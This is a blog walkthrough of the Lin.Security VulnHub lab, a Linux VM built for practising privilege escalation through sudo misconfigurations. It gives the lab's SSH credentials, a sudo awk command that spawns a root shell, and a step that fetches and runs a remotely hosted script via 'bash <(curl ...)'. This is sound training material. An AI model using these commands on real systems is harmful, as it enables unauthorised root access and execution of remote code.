Lin.Security – Vulnhub CTF Challenge Walkthrough

  • 161
  •  
  •  
  •  
  •  
  •  
  •  
  •  
    161
    Shares

Lin Security is available at Vulnhub. This VM is made for “Beginners” to master Privilege Escalation in Linux Environment using diverse range of techniques. There is no vulnerability in Kernel and you have to exploit Software misconfiguration vulnerabilities. SSH credentials for this machine are “bob: secret”, so there is no need to run Nmap scans.

Import this VM to Virtualbox and turn on.

Use netdiscover to determine the IP and register this IP to “/etc/hosts”.

 

Login to this machine through SSH using credentials “bob: secret”.

 

Type “sudo -l” to see the commands that user “bob” may run as root.

 

This is the list of commands that user “bob” may run as root. First, we’ll try to include the shell directly.

 

You can use “awk” to get root.

sudo awk 'BEGIN {system("/bin/bash")}'

 

Now, we’ll abuse curl to gain root privileges. We host a script on our Python Server.

echo #!/bin/bash > script.sh
echo "sudo /bin/bash" > script.sh
python -m SimpleHTTPServer 1234

 

Download the script using curl and execute it.

bash <(curl -s http://192.168.0.105:1234/script.sh)

 

There are a lot of ways to abuse these commands at https://gtfobins.github.io/, you can try them by yourself.

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

The following two tabs change content below.

Usama Azad

I'm an Undergraduate Student in my Final Year. My interests are Wireless Security, Penetration Testing, Linux, Python and C/C++. My hobbies include exploiting VulnHub and Hack The Box machines and writing articles about InfoSec. If you have any queries about my articles, hit me up on twitter/usamaazad14

Usama Azad

I'm an Undergraduate Student in my Final Year. My interests are Wireless Security, Penetration Testing, Linux, Python and C/C++. My hobbies include exploiting VulnHub and Hack The Box machines and writing articles about InfoSec. If you have any queries about my articles, hit me up on twitter/usamaazad14

Leave a Reply